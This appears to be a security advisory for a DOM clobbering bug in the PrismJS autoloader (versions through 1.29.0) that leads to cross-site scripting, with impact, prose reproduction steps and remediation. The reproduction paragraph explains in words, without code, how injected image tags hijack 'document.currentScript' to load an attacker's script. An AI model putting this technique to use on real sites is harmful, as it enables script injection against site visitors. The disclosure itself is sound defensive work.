PrismJS DOM Clobbering Vulnerability Leading to Cross-Site Scripting

A DOM clobbering vulnerability has been identified in PrismJS versions through 1.29.0. This issue allows for cross-site scripting (XSS) attacks in web pages that embed Prism and permit users to inject HTML elements without scripts, such as an image tag with a controlled name attribute. The vulnerability arises because the Prism autoloader plugin's use of 'document.currentScript' can be manipulated by attacker-injected HTML, leading to the execution of malicious scripts.

Impact

Exploitation of this vulnerability allows for cross-site scripting (XSS) attacks, where an attacker can inject and execute malicious scripts in the context of the user's browser.

Reproduction

To reproduce this vulnerability, embed a controlled image tag without a script into a web page that uses PrismJS version 1.29.0. The image tag should be crafted to include a name attribute that will be interpreted by the Prism autoloader plugin. When the page is loaded, the injected image will clobber the 'currentScript' reference, causing Prism to load a script from an attacker-controlled domain.

Remediation

Users are advised to update to the latest version of PrismJS, where this vulnerability has been addressed. For those using version 1.29.0, a manual patch is available by adding an additional type check when accessing 'document.currentScript' to ensure it only returns script elements.